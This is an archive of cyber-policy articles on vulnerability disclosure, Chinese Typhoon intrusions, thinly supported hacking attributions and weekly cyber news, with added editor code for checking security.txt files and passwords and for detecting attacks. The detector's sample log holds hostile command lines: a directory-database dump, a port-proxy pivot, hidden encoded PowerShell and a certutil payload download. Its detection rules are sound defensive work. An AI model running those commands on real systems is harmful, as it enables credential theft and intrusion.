Tag Archive for: Hacking

Australia’s cyber strategy needs a vulnerability disclosure upgrade

Australia is in a race against time. Cyber adversaries are exploiting vulnerabilities faster than we can identify and patch them. Both national security and economic considerations demand policy action.

According to IBM’s Cost of a Data Breach Report, the average cost of a data breach in Australia reached a record $4.26 million in 2024. By contrast, identifying vulnerabilities through ethical hackers costs on average $1670 per finding, according to HackerOne’s annual security report.

The equation is simple: preventing breaches through the disclosure of vulnerabilities is far cheaper than dealing with the fallout of a successful attack.

While vulnerability disclosure programs are mandatory for Australian government entities under the Protective Security Policy Framework, they are not required for other organisations. Any organisation can start such a program without significant outlay, though some use rewards to incentivise testing.

Certainly, the Australian government has made progress. Amendments to the Security of Critical Infrastructure Act imposed stronger cybersecurity obligations. The Cybersecurity Act, passed in November 2024, also lays a foundation for addressing cyber risks. One promising element of the act is the development of a security standard for connected devices, which will require manufacturers to provide structured channels for ethical hackers to report vulnerabilities.

This measure should be an early step toward a national coordinated vulnerability disclosure policy. Such disclosure, often including a public-facing vulnerability disclosure program, is a cybersecurity best practice that provides clear guidelines for ethical hackers to report vulnerabilities to organisations before malicious actors can exploit them. Coordinated vulnerability disclosure may also encompass vulnerability rewards programs, also known as bug bounty programs, that, through reward, incentivise ethical hackers to responsibly disclose vulnerabilities.
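A vulnerability disclosure program needs a channel that researchers can find without guesswork. The usual machine-readable front door is a security.txt file published under /.well-known/ as described in RFC 9116. The Python below is an added example by the editor, not code from the article or from any government program, that parses such a file and checks the points researchers and auditors trip over most often: a missing or malformed Contact, a missing, duplicated, stale or too-distant Expires, and non-HTTPS policy links. Both sample files are constructed, and the fixed "now" exists only so the checks are reproducible.

```python
"""Check a draft RFC 9116 security.txt, the machine-readable front door of a
vulnerability disclosure program. Added example by the editor, not code from
the original article; the two sample files below are constructed."""
from datetime import datetime, timedelta, timezone
from typing import Dict, List

# Constructed sample of what an organisation publishes at /.well-known/security.txt
SAMPLE_SECURITY_TXT = """\
# Constructed sample, not a real organisation
Contact: mailto:security@example.com.au
Contact: https://example.com.au/vdp/report
Expires: 2026-12-31T00:00:00.000Z
Preferred-Languages: en
Policy: https://example.com.au/vdp
Canonical: https://example.com.au/.well-known/security.txt
"""

# Constructed sample containing the mistakes the checks are meant to catch
STALE_SECURITY_TXT = """\
Contact: security@example.com.au
Expires: 2024-01-01T00:00:00Z
Preferred-Languages: en
Preferred-Languages: fr
Policy: http://example.com.au/vdp
"""

# Fixed "now" so the checks are reproducible; a real run uses datetime.now(timezone.utc)
NOW_FOR_DEMO = datetime(2026, 6, 1, tzinfo=timezone.utc)
ALLOWED_CONTACT_SCHEMES = ("mailto:", "tel:", "https://")


def parse_security_txt(text: str) -> Dict[str, List[str]]:
    """Field names are case-insensitive and may repeat; comment lines start with '#'."""
    fields: Dict[str, List[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        name, sep, value = line.partition(":")
        if not sep:
            raise ValueError(f"malformed line: {raw!r}")
        fields.setdefault(name.strip().lower(), []).append(value.strip())
    return fields


def validate_security_txt(text: str, now: datetime = NOW_FOR_DEMO) -> List[str]:
    """Return the problems found; an empty list means the file passes these checks."""
    problems: List[str] = []
    fields = parse_security_txt(text)

    contacts = fields.get("contact", [])
    if not contacts:
        problems.append("missing required Contact field")
    for c in contacts:
        if not c.startswith(ALLOWED_CONTACT_SCHEMES):
            problems.append(f"Contact must be a mailto:, tel: or https: URI, got {c!r}")

    expires = fields.get("expires", [])
    if len(expires) != 1:
        problems.append("exactly one Expires field is required")
    else:
        try:
            when = datetime.fromisoformat(expires[0].replace("Z", "+00:00"))
        except ValueError:
            problems.append(f"Expires is not an ISO 8601 timestamp: {expires[0]!r}")
        else:
            if when.tzinfo is None:
                when = when.replace(tzinfo=timezone.utc)
            if when <= now:
                problems.append("Expires is in the past; researchers will treat the file as stale")
            elif when - now > timedelta(days=365):
                problems.append("Expires is more than a year ahead; RFC 9116 recommends less")

    if len(fields.get("preferred-languages", [])) > 1:
        problems.append("at most one Preferred-Languages field is allowed")

    for name in ("policy", "canonical", "acknowledgments", "hiring"):
        for url in fields.get(name, []):
            if not url.startswith("https://"):
                problems.append(f"{name} must be an https URL, got {url!r}")
    return problems


if __name__ == "__main__":
    for label, text in (("sample", SAMPLE_SECURITY_TXT), ("stale", STALE_SECURITY_TXT)):
        print(label, validate_security_txt(text) or ["ok"])
```

The Expires check matters more than it looks: a file whose date has passed tells researchers nobody is maintaining the program, and a date years away tells them the same thing in a different way. Run the check on a schedule, not just when the file is first published.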

In addition to the rising costs of breaches, our cyber adversaries are pushing ahead with the exploitation of existing bugs and hoovering up new ones.

The widely reported Volt Typhoon operation offers an insight into the national security threat. Since at least mid-2021, state-backed Chinese hackers strategically pre-positioned themselves within critical systems in the United States.

The 2024 Annual Threat Assessment from the US Office of the Director of National Intelligence underscores the intent behind such operations:

If Beijing believed that a major conflict with the United States were imminent, it would consider aggressive cyber operations against U.S. critical infrastructure and military assets. Such a strike would be designed to deter U.S. military action by impeding U.S. decision-making, inducing societal panic, and interfering with the deployment of U.S. forces.

Cooperation with Five Eyes partners has led to joint advisories and critical network threat-hunting efforts, but the Volt Typhoon operation underscores that unmitigated vulnerabilities pose a strategic risk for Australia.

China has taken deliberate steps to make operations using unmitigated vulnerabilities not only viable but the new normal. To get to this operational footing, China integrated vulnerability reporting into its national cybersecurity framework. Under its 2021 Regulations on the Management of Network Product Security Vulnerabilities, issued under the Cybersecurity Law, vendors must report vulnerabilities in their products, including those used in critical infrastructure, to the Ministry of Industry and Information Technology within two days of discovery, whether or not a fix exists. By all accounts, China has done a remarkable job of setting up a framework to industrialise vulnerability disclosure to further its strategic objectives.

Australia is making progress, but not quickly enough to keep pace. Other states’ vulnerability collection and exploitation efforts are advancing much more quickly. China’s strategic use of zero-day exploits demonstrates how adversaries can rapidly identify, collect and weaponise vulnerabilities, gaining a significant tactical advantage.

As the Australian government moves into Horizon Two of the National Cyber Security Strategy 2023–2030, it must prioritise addressing long-term vulnerabilities and increasing resilience. The next phase of the strategy should include the formalisation of a national coordinated vulnerability disclosure policy, including the strong endorsement of vulnerability disclosure programs to encourage an economy-wide ‘see something, say something’ approach to cybersecurity.

One important element of it could also include federal funding of bug bounty programs across the federal government. This would also bring Australia in line with the US and Britain, which have embraced these programs to identify and report vulnerabilities in their defence portfolios. At a time when the security of the AUKUS program is paramount, any gap that leaves Australia’s defence systems vulnerable to undetected exploits could jeopardise national security and undermine our allies’ confidence in Australian information security.

In an era of evolving cyber threats, Australia’s national security and economic future depend on the resilience of its digital infrastructure. A national coordinated vulnerability disclosure policy is essential for addressing vulnerabilities before they are exploited. With cyber adversaries such as China shifting their cyber doctrine to exploit vulnerabilities, the time to act is now.

In case we forgot, Typhoon attacks remind us of China’s cyber capability—and intent

Australians need to understand the cyber threat from China.

US President Donald Trump described the launch of Chinese artificial intelligence chatbot, DeepSeek, as a wake-up call for the US tech industry. The Australian government moved quickly to ban DeepSeek from government devices.

This came just weeks after the Biden administration stunningly admitted on its way out of office that Chinese Communist Party hackers were targeting not just political and military systems but also civilian networks such as water and health. The hackers could shut down US ports, power grids and other critical infrastructure.

These incidents remind us that China has the intent, and increasingly the capability, to seriously challenge US and Western technology advantage. Australia will be an obvious target if regional tensions continue to rise. It must be well-prepared.

As ASPI’s Critical Technology Tracker highlights, China’s advances in critical technologies have been foreseeable for some time. US and Western confidence is manifesting as complacency.

DeepSeek has emerged as a cheap, open-source AI rival to the seemingly indomitable US models. It could enable Chinese technology to become enmeshed in global systems, perhaps even in critical infrastructure.

Meanwhile, Chinese hackers have stealthily embedded themselves in US critical infrastructure, potentially enabling sabotage, or the coercive threat of sabotage, to extract something Beijing wants. The two main perpetrators of these operations are Salt Typhoon and Volt Typhoon. The Chinese government backs both.

Salt Typhoon’s infiltration of at least nine US telecom networks has enabled CCP-sponsored hackers to geolocate individuals and record phone calls, directly threatening personal privacy and national security. This devastating counterintelligence failure includes the identification of individuals that US agencies suspect are agents working for China. It also enables CCP surveillance and coercion of US nationals and Chinese dissidents.

If anything, Volt Typhoon poses a greater threat, with covert access to critical infrastructure networks. Each reinforces the dangers of the other.

Some US officials involved in the investigation have said the hack is so severe, and the networks so compromised, that the United States may never be sure the intruders have been fully rooted out.

Both operations demonstrate sophisticated stealth. In particular, Volt Typhoon’s technique of living off the land, in which the intruders sit in victim systems for long periods using those systems’ own built-in administrative tools and legitimate credentials rather than deploying malware, made detection harder. Access looked outwardly legitimate, and there was no malicious binary for antivirus to flag. This reveals an intent to map and maintain access to critical systems, not for immediate destruction, but for whenever best serves Beijing’s interests. In this sense, it can be seen as a precursor to war.
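The behaviour described above is what detection has to key on: not a malicious file, but a legitimate built-in tool used in a way the host’s normal users never use it. As an added example (the editor’s code, not something from the article or from any government advisory), the Python below runs a handful of living-off-the-land rules over constructed process-creation records and ranks hosts for triage. The tool names and command-line patterns are the editor’s assumptions about commonly abused Windows utilities (port proxies, directory-database dumps, encoded PowerShell, certutil downloads, built-in reconnaissance commands) and should be tuned against your own baseline; the log lines are constructed.

```python
"""Flag living-off-the-land activity in process-creation logs.

Added example by the editor, not material from the article or from any
agency advisory quoted in it. The log lines are constructed, and the rules
encode common abuses of built-in Windows tools as the editor understands
them; tune them to your own environment."""
import re
from typing import Dict, List, NamedTuple

# Constructed process-creation records: timestamp|host|user|parent|command line
SAMPLE_LOG = """\
2024-03-01T01:02:03Z|DC01|CORP\\svc_backup|services.exe|ntdsutil.exe "ac i ntds" "ifm" "create full C:\\Temp\\x" q q
2024-03-01T01:05:10Z|WEB02|CORP\\web_admin|cmd.exe|netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5 connectport=3389
2024-03-01T01:06:44Z|WEB02|CORP\\web_admin|cmd.exe|powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkA
2024-03-01T01:07:01Z|WS17|CORP\\alice|explorer.exe|certutil.exe -urlcache -split -f http://10.0.0.9/t.txt C:\\Users\\alice\\t.exe
2024-03-01T01:08:30Z|WS17|CORP\\alice|explorer.exe|notepad.exe C:\\Users\\alice\\notes.txt
2024-03-01T01:09:00Z|WS17|CORP\\alice|cmd.exe|ipconfig /all
"""


class Rule(NamedTuple):
    name: str
    severity: str
    pattern: "re.Pattern[str]"


# Each rule matches a legitimate tool used in a way ordinary users never use it
RULES: List[Rule] = [
    Rule("ntds_dump", "high", re.compile(r"\bntdsutil(\.exe)?\b.*\bifm\b", re.I)),
    Rule("portproxy_pivot", "high", re.compile(r"\bnetsh\b.*\bportproxy\b.*\badd\b", re.I)),
    Rule("encoded_powershell", "medium", re.compile(r"\bpowershell(\.exe)?\b.*\s-(enc|encodedcommand|e)\b", re.I)),
    Rule("certutil_download", "medium", re.compile(r"\bcertutil(\.exe)?\b.*-urlcache\b.*\bhttps?://", re.I)),
    Rule("recon_builtin", "low", re.compile(r"^(ipconfig|whoami|net\s+(user|group|view))\b", re.I)),
]


class Alert(NamedTuple):
    host: str
    user: str
    rule: str
    severity: str
    command: str


def parse_line(line: str) -> Dict[str, str]:
    """Split one record; the command line is last so it may contain anything."""
    ts, host, user, parent, cmd = line.split("|", 4)
    return {"ts": ts, "host": host, "user": user, "parent": parent, "cmd": cmd}


def detect(log: str) -> List[Alert]:
    """Run every rule over every record and return the hits in log order."""
    alerts: List[Alert] = []
    for line in log.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        for rule in RULES:
            if rule.pattern.search(rec["cmd"]):
                alerts.append(Alert(rec["host"], rec["user"], rule.name, rule.severity, rec["cmd"]))
    return alerts


def hosts_needing_triage(alerts: List[Alert]) -> List[str]:
    """Order hosts by accumulated severity; several low-key LOTL hits on one host add up."""
    weight = {"high": 3, "medium": 2, "low": 1}
    score: Dict[str, int] = {}
    for a in alerts:
        score[a.host] = score.get(a.host, 0) + weight[a.severity]
    return sorted(score, key=lambda h: (-score[h], h))


if __name__ == "__main__":
    hits = detect(SAMPLE_LOG)
    for a in hits:
        print(f"{a.severity:6} {a.rule:20} {a.host:6} {a.user:18} {a.command[:60]}")
    print("triage order:", hosts_needing_triage(hits))
```

The point of the scoring step is that no single line here is conclusive: an administrator may legitimately run ipconfig, and an automated backup may legitimately touch the directory database. What distinguishes an intrusion is the combination on one host within a short window, which is why the rules are cheap and the aggregation is where the analyst’s attention goes.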

The focus on critical infrastructure underscores how malicious cyber operations can undermine national resilience during peacetime and crises and sow doubt on a government’s ability to safeguard the people. Through these operations, adversaries could influence a target country’s decisions as leaders avoid taking any action that might provoke a disruption or sabotage.

Australia’s intelligence agencies are aware of these risks. Australia’s director-general of security, Mike Burgess, warned in his 2024 annual threat assessment that ‘the most immediate, low cost and potentially high-impact vector for sabotage [by foreign adversaries] is cyber’. This was reinforced in his 2025 assessment when he declared that ‘foreign regimes are expected to become more determined to, and more capable of, pre-positioning cyber access vectors they can exploit in the future.’ He warned that we’re getting closer to the threshold for ‘high-impact sabotage’.

The Australian Signals Directorate has been improving preparedness and resilience. It has helped Australian organisations to defend themselves and mitigate prepositioning and living-off-the-land techniques. ASD has also been building offensive capabilities needed to impose costs on attackers.

We must avoid the traps China sets as it seeks global information dominance. First, we can’t be complacent. It’s unsafe to assume that the US and its allies will remain decisively better than China, and that we can counter whatever Beijing can do. Second, we must reject the viewpoint that ‘everyone spies so it would be hypocritical to condemn China’, as it is a false moral equivalence. Third, we must avoid arguing that there is no present threat just because Beijing doesn’t have the intent to go to war today. This wishful thinking is a dangerous mistake. If we fall into these traps, we present Beijing with more time and render ourselves incapable of advancing our interests.

Chinese capabilities are strong and growing, and the way they are being used by the CCP demonstrates clear malign intent. This should be pushing elected governments to take protective action and prepare for future cyber operations.

The reluctance to see the threats in the information domain as equal to traditional threats is a decades-old mistake that must be corrected. We need to minimise our dependence on China for technology.

Hacking the headlines: the geopolitics of cybersecurity marketing

The intersection of geopolitics and cybersecurity can make for an irresistible headline. For the media, it’s a great story; for political players, it’s a talking point they can use to appeal to their base or to browbeat their opponents with; and for cybersecurity companies, it can be an unbeatable opportunity to raise their profile and market their services.

That can, however, encourage some of the individuals and institutions that bring allegations of hacking and espionage to light to make the biggest, most explosive claims possible. Sometimes accuracy, nuance or reasonable doubt go under the bus.

Two very high-profile hacking allegations with serious geopolitical implications have been made in recent weeks, but close inspection shows them to be based on thin and inconclusive evidence from private cybersecurity companies.

The first case involves a subsidiary of Burisma, the Ukrainian gas company which became embroiled in Donald Trump’s impeachment trial. ‘Russians hacked Ukrainian gas company at center of impeachment’, was the New York Times’ headline on 13 January. ‘Russians breached Burisma during Trump impeachment probe’, proclaimed the Wall Street Journal, while Fox went with ‘Russians hacked Burisma, Ukrainian company that hired Hunter Biden: Researchers’.

The researchers the Fox headline refers to were from Area 1 Security, a cybersecurity company that provides phishing detection and prevention services to private-sector and political organisations. Area 1’s CEO, Oren Falkowitz, told the Associated Press and Time magazine that his company’s findings were ‘incontrovertible’.

In fact, the story of a Russian hack on Burisma has proved to be very controvertible. There are two issues at play here. One is the way in which some media coverage has misinterpreted or exaggerated Area 1’s findings. The second is the report itself. It’s eight pages long, but that includes one each for the title page, the end page and three screenshots. This short document provides inconclusive evidence that any successful hack of Burisma or its subsidiary took place, or that Russian state-linked actors were responsible.

Despite the headlines decrying a Russian attack on Burisma itself, the report actually alleges that Russia’s GRU was seeking to phish email credentials from a Burisma subsidiary, KUB-Gas LLC. Area 1’s analysis is based on the fact that someone has registered lookalike domains for remote email login pages belonging to KUB-Gas and other Burisma subsidiaries. Area 1 asserts this was the GRU (Russia’s military intelligence agency) based on past patterns of behaviour.

So, this was a phishing attempt, not a hack; there’s no indication it was successful; and evidence linking the phishing attempt to the GRU is highly circumstantial.

Facebook’s former head of security Alex Stamos wrote on Twitter: ‘This report tying GRU to a Burisma phishing attack is both literally and figuratively very thin. No details on what data they have other than a public phishing page. The absolute rhetorical certainty instead of standard language on confidence level are red flags.’

Stamos notes that large incident response and tech companies have earned the benefit of the doubt on attribution claims thanks to years of care and obvious access to huge datasets. ‘This isn’t one of those companies and this kind of report doesn’t help [them] build that reputation’, he says.

Nonetheless, the notion that Russia hacked Burisma has become a political talking point—including being cited in House Intelligence Committee chair Adam Schiff’s opening argument at the Senate impeachment hearings. That’s happened despite the claim not being supported by Area 1’s research. Relations among the US, Ukraine and Russia are already fraught; the Burisma hacking allegations can only add to this strain. The geopolitical narrative has taken on a life of its own without regard to the facts, or the lack of them.

A similar story has been playing out in relation to the alleged hack of Amazon founder Jeff Bezos’s phone by Saudi Arabia’s Crown Prince Mohammed bin Salman. On 22 January, international headlines broke airing allegations that Bezos’s phone had been hacked using malware sent in a WhatsApp message directly from bin Salman’s own account.

However, when the research underlying these claims was published a short time later, it again left more questions than answers.

The allegations are based on a report by FTI Consulting, a cybersecurity company hired by Bezos to analyse his phone after personal photographs were leaked to the media last year. FTI’s analysts found no malware on the device.

What they did find was that in early May 2018, Bezos’s phone began transmitting an unusually large amount of data, shortly after a video file was sent from bin Salman’s WhatsApp account, and continued to transmit a high volume of data for months thereafter. This is strange behaviour and warrants investigation, but it doesn’t constitute solid proof that Bezos’s phone was hacked at all, let alone that it was hacked by bin Salman’s WhatsApp message. There’s nothing to disprove the claim either, but that’s no basis for launching such a serious allegation.

One aspect of the report which has experts puzzled is the claim that WhatsApp’s end-to-end encryption prevented FTI from decrypting the content of the downloader to inspect it for malicious code. The decryption keys should be stored on the device itself, so it’s not clear what—other than, perhaps, simple lack of expertise—prevented FTI from doing so.

Cybersecurity expert Rob Graham wrote on Twitter: ‘I see nothing here that suggests Bezos’ phone was hacked. It contains much that says “anomalies we don’t understand”, but lack of explanations point to incomplete forensics, not malicious APT actors. It uses phrases like “unauthorized exfiltration” to mean “outgoing data we can’t explain”. This is bad for such a report, really bad.’

Again, despite the inconclusive evidence, all it took was the initial headline splash for the ‘Saudi Arabia hacked Jeff Bezos’ political narrative to take off. The geopolitical ramifications of the story were immediately apparent: the United Nations called for an investigation, a mass information operation on social media demanded a Saudi boycott of Amazon, public denials were issued by Saudi officials and bin Salman himself, and equally public questions were raised over the White House’s silence. The impact of the allegations is likely to reverberate for some time.

There are two lessons from all of this. The first is that journalists and media organisations should be asking much tougher questions whenever a cybersecurity company tries to shop them a story that sounds a little too cinematic to be true. They also need to resist the urge to write a splashy but misleading headline. If the research doesn’t prove that a hack actually happened, as in both of these cases, the headline shouldn’t assert that it did.

The second is that cybersecurity companies need to act responsibly when publishing research, particularly research that’s likely to have very real geopolitical consequences. The publicity involved in making an explosive, but poorly supported, allegation is not worth either the potential blowback from making incorrect claims about the activities of nation-states or political figures, or the long-term erosion of their reputations in the cybersecurity field.

Cyber wrap

This week one of the largest ransomware incidents to date, ‘WannaCrypt’ or ‘WannaCry’, affected the operations of at least 300,000 machines worldwide, encrypting and locking victims out until a Bitcoin ransom equivalent to US$300 was paid. It affected the operations of about 40 hospitals and other health organisations in the UK, as well as major infrastructure companies and government agencies across Europe. Australia appears to have escaped the worst of it, with some businesses affected but no major disruptions to critical services. The incident has prompted the usual calls to patch software and update anti-virus services.

UK malware researcher @MalwareTech, became an accidental hero when he registered a domain name found within the WannaCry malware which acted as a ‘kill switch’ for the virus. Not a bad return on a US$10.69 investment. Despite the unexpected relief, variants without the switch have since popped up. Brian Krebs estimates that people have coughed up US$26,148 so far—a paltry return considering the damage done. By comparison, CryptoWall raised US$325 million in 2015. Efforts to uncover those behind WannaCry are in full swing, with some early signs suggesting a North Korean connection.

WannaCry has capitalised on a vulnerability in Windows’ SMBv1 file-sharing protocol that was part of the cache of NSA tools leaked by Shadow Brokers in mid-April. Microsoft patched the vulnerability in March (MS17-010), and has this week released further patches for unsupported operating systems such as Windows XP. The episode has re-ignited calls from Microsoft for a Digital Geneva Convention, and prompted the company to clip the NSA over the ears for stockpiling these vulnerabilities. However, these altruistic measures from Microsoft, and continuing calls to ‘just patch’, don’t fully consider the difficulty of doing so. Many organisations don’t have, and didn’t have, the resources to update their systems to the latest and most secure versions of Windows. On the other hand, this vulnerability was a security defect in a product that Microsoft put out, yet, under current software licensing law, the company isn’t held liable. Commentators are questioning why the current incentive structure requires hospitals to take on the cost of paying licensing fees every half-decade to buy security features we expect as a given of any other product.

After a significant delay President Trump has finally signed an executive order to strengthen the cybersecurity of critical infrastructure and federal computer networks. In good news, the order doesn’t appear to be a total car wreck, with Wired calling it ‘refreshingly even-keeled’. It calls for numerous reviews to be completed within 90 days, and has a strong focus on accountability, aligning cyber risk management with budgets, and taking action to replace legacy systems. It has also addressed issues including international cooperation, workforce development and threats to the defence industrial base. The order has found some support in Congress, but Senator John McCain called for more urgent action in finalising a national cybersecurity strategy stressing there was no need for ‘more assessments, reports and reviews.’ Progress may also be further slowed by the lethargic pace of recruitment of senior government cybersecurity officials.

There was also Congressional support for the mandatory application of the NIST cybersecurity framework also included in the executive order. NIST have this week issued their revised standard for password best practice (SP 800-63B), reversing previous requirements for scheduled password changes and for combinations of upper- and lower-case letters, numbers and symbols, and replacing them with more ‘human-friendly’ requirements: a minimum length, support for long passphrases, and rejection of previously compromised passwords. This could include emoji passwords if the user so desires.
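The new guidance is easy to implement wrongly, so here is what a verifier following it looks like in practice. This is an added example by the editor, not code from NIST or from the article: length rather than composition rules, no expiry logic at all, NFKC normalisation, Unicode counted per code point so an eight-emoji password is eight characters long, rejection of repetitive or sequential strings and of context-specific words, and a check against known-compromised passwords. The breached-password list is a constructed stand-in for a real corpus, and the five-character SHA-1 prefix lookup mirrors the shape of Have I Been Pwned’s range API as the editor understands it, so that a production deployment would swap the local index for that service without sending the full hash off-device.

```python
"""Password acceptance rules in the style of NIST SP 800-63B. Added example by
the editor; the breached-password list and the k-anonymity index are
constructed stand-ins for a real corpus such as the Have I Been Pwned range API."""
import hashlib
import unicodedata
from typing import Dict, List, Set

MIN_LENGTH = 8    # 800-63B minimum for user-chosen memorised secrets
MAX_LENGTH = 64   # 800-63B requires verifiers to accept at least 64 characters

# Constructed breached-password corpus; a real deployment uses a large dataset
BREACHED = {"password", "12345678", "qwertyuiop", "letmein123", "iloveyou!", "P@ssw0rd"}


def sha1_upper(password: str) -> str:
    return hashlib.sha1(password.encode("utf-8")).hexdigest().upper()


# Constructed range index in the shape of the HIBP k-anonymity API: the client
# would send only the first five hex characters of the SHA-1 and match the rest
# locally, so the full hash never leaves the client.
RANGE_INDEX: Dict[str, Set[str]] = {}
for _pw in BREACHED:
    _h = sha1_upper(_pw)
    RANGE_INDEX.setdefault(_h[:5], set()).add(_h[5:])


def normalise(password: str) -> str:
    """NFKC, so visually identical input from different keyboards compares equal."""
    return unicodedata.normalize("NFKC", password)


def in_breach_corpus(password: str) -> bool:
    h = sha1_upper(password)
    return h[5:] in RANGE_INDEX.get(h[:5], set())


def is_repetitive_or_sequential(password: str) -> bool:
    """Reject 'aaaaaaaa' and 'abcdefgh'/'12345678'-style runs, as 800-63B suggests."""
    if len(set(password)) == 1:
        return True
    codes = [ord(c) for c in password]
    steps = {b - a for a, b in zip(codes, codes[1:])}
    return steps in ({1}, {-1})


def check_password(password: str, username: str = "", service: str = "") -> List[str]:
    """Return reasons for rejection; an empty list means the password is acceptable.

    Deliberately absent: any requirement for upper case, digits or symbols, and
    any notion of expiry. Both were dropped by 800-63B."""
    pw = normalise(password)
    reasons: List[str] = []
    n = len(pw)  # code points, so an 8-emoji password counts as 8, not as bytes
    if n < MIN_LENGTH:
        reasons.append(f"shorter than {MIN_LENGTH} characters")
    if n > MAX_LENGTH:
        reasons.append(f"longer than {MAX_LENGTH} characters")
    if in_breach_corpus(pw):
        reasons.append("appears in a breach corpus")
    if is_repetitive_or_sequential(pw):
        reasons.append("repetitive or sequential characters")
    low = pw.lower()
    for word in (username, service):
        if word and word.lower() in low:
            reasons.append(f"contains context-specific word {word!r}")
    return reasons


if __name__ == "__main__":
    for candidate in ("correct horse battery staple", "🦀🐍🔒🚀🌈🎉🔥🍕", "12345678", "P@ssw0rd"):
        print(repr(candidate), check_password(candidate, username="alice") or ["accepted"])
```

Note that ‘P@ssw0rd’ is rejected only because it is in the constructed corpus: it satisfies every old-style composition rule, which is exactly why the guidance moved from composition rules to breach lists. The quality of the corpus, not the cleverness of the rules, decides how useful the check is.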

The recent Federal Budget contained a couple of interesting cyber-related initiatives. A new Cyber Security Advisory Office (CSAO) will pop up in PM&C’s Digital Transformation Agency (DTA). Funded to the tune of $10.7 million over the forward estimates, the CSAO is the government’s response to recommendations from #censusfail investigations. The Office is tasked with acting as the ‘single, comprehensive source of truth to which agencies can turn to’ for cybersecurity expertise. Aspirational…

The DTA is also set to lead broader IT procurement and projects, including hosting a ‘Digital Investment Management Office’ and a ‘Digital Marketplace’. The Agency will control a $129.6 million ‘Modernisation Fund’ that will focus on modernising agencies, upgrading cultural centres, and consolidating APS-wide IT, finance, and human resources functions into six corporate service hubs. The Fund will also seek to open up government data for public use through the Data Integration Partnership of Australia.

Finally, the Budget has earmarked funds for the DTA to kick off GovPass, a scheme to build a trusted digital identity framework for government services. That’s a lot of projects for an agency that had its future called into question as recently as February this year.

Cyber wrap


In big news this week for our Kiwi neighbours, New Zealand opened its first national Computer Emergency Response Team (CERT). CERT NZ, a deliverable of New Zealand’s 2015 Cyber Security Strategy, has been established within the Ministry of Business, Innovation and Employment with NZ$22.2 million funding over four years. CERT NZ will be the centrepiece of New Zealand’s cyber architecture and be responsible for cyber vulnerability and threat identification, incident reporting, response coordination and general readiness support for the Kiwi economy. Communications Minister Simon Bridges stated that the CERT ‘will make it easier for people at work and at home to understand, prevent and recover from cyber security incidents’.

Twitter resisted pressure from the US government last month to unmask the identity of an individual tweeting criticism about President Trump from account @ALT_USCIS. The social media platform filed a law suit to block the administration’s request, citing users’ First Amendment rights to freedom of speech. Twitter’s move was backed by the American Civil Liberties Union, who described it as ‘an affront to our fundamental right to anonymous expression’. Customs and Border Protection proceeded to withdraw the summons the day after Twitter filed the lawsuit. This is a positive development after the administration cracked down on federal agency social media activity in January.

Spanish police arrested Russian computer programmer Pyotr Levashov in Barcelona this week in collaboration with the FBI. While rumours are circling about potential connections between this arrest and the 2016 US presidential election campaign hacking, the central focus looks to be Levashov’s responsibility for the Kelihos botnet. This botnet has enslaved hundreds of thousands of computers and used the resulting network to facilitate international malicious cyber activities such as the mass distribution of spam, spreading of ransomware, and theft of login credentials. The US Department of Justice announced it’s undertaking ‘an extensive effort to disrupt and dismantle the Kelihos botnet’ and the botnet operator is expected to be extradited to the US.

The transition from IPv4, the Internet’s current addressing system, to the next-generation protocol IPv6 may not be as seamless as we would hope. The transition is necessary because demand for addresses has outgrown IPv4: it offers about 4.3 billion unique addresses (2^32), whereas IPv6 offers 340 undecillion (2^128). Unfortunately, new research from the NATO Cooperative Cyber Defence Centre of Excellence in Estonia indicates that this complex transition may itself be introducing vulnerabilities.

In an effort to combat fake news, Google is expanding a fact check program for its search and news services to the entire globe. The company’s idea of providing fact checks to help its users ‘divine fact from fiction’ was initially piloted in the US and UK at the end of last year, but is now available to the whole world. Google isn’t undertaking the checks in-house, but relying on the validations of third party organisations such as PolitiFact, FactCheck.org and Snopes. This tool is a great step in the right direction to combat the spread of misinformation online, providing readers with an indication of how authoritative a source is and whether it reflects the general consensus view.

Notorious hacker(s), the Shadow Brokers, have stepped back in the limelight over the weekend, releasing more alleged hacking tools of the NSA. After leaking a number of stolen NSA exploits in August last year, the group tried and failed to auction off the contents of a second cache for an asking price of $1 million. This week the Shadow Brokers group has published the password needed to decrypt this second cache along with a political rant at President Trump on Medium, chastising him for abandoning his ‘base’. Despite the fanfare, many have been left disappointed by this second dump, which consists mostly of tools that are much older and target operating systems that are generally no longer in service. NSA’s friends over at Langley haven’t had a good week either with Wikileaks releasing the third tranche of the Vault 7 leak on CIA cyber tools, titled ‘Grasshopper’, last Friday.

Dallas learned an important lesson on infrastructure security this week with the city’s emergency warning system being compromised by a hacker. The network of sirens across the city were activated just after midnight on Friday night, triggering public panic, more than 4,400 911 calls and an emergency call wait time of six minutes. The incident highlights the vulnerability of critical national infrastructure and the impact its compromise can have on a government’s ability to deliver essential services. The city has requested assistance from the Federal Communications Commission to identify the source of the breach.

And to finish things off, we’ve got your weekly report reading sorted. Check out McAfee Labs Threat Report, which focuses on intelligence sharing, the Mirai IoT botnet and other threat statistics. Dip into the cyber workforce dilemma with the US Government Accountability Office’s report on how the government should train and recruit the cybersecurity workforce to address the threats to federal IT systems. Lastly, the Center for a New American Security’s Phishing in Troubled Waters will take you through the state of cyber espionage across the Pacific and the Strait of Taiwan. Happy reading!

Cyber wrap

This week we continue our look back at some of the year’s biggest cyber stories in our final cyber wrap for 2016!

China finally adopted its controversial new cybersecurity law on 7 November, much to the dismay of the international community. The law states that companies must provide ‘technical support’ and data access to the government on matters of crime and national security, the vague definition of which has led to concerns that encryption back doors will be demanded. Any data gathered by companies in China will now have to be stored in-country—a requirement known as data-localisation—and companies will be subject to invasive security certification processes, which some believe could pose a threat to intellectual property rights. Despite official denials from the Chinese Foreign Ministry, such concerns sparked an outcry from the international business community and a petition to Premier Li Keqiang from more than 40 global business groups.

The legislation also requires real-name registration for instant messaging services and criminalises online content that undermines ‘national honour’ or subverts China’s sovereignty. Online privacy advocates are worried that the law will further repress freedom of online expression in China, and lead to increasing self-censorship. The implementation rules are still to be formulated, and are expected to come into force on 1 June 2017. Watch this space.

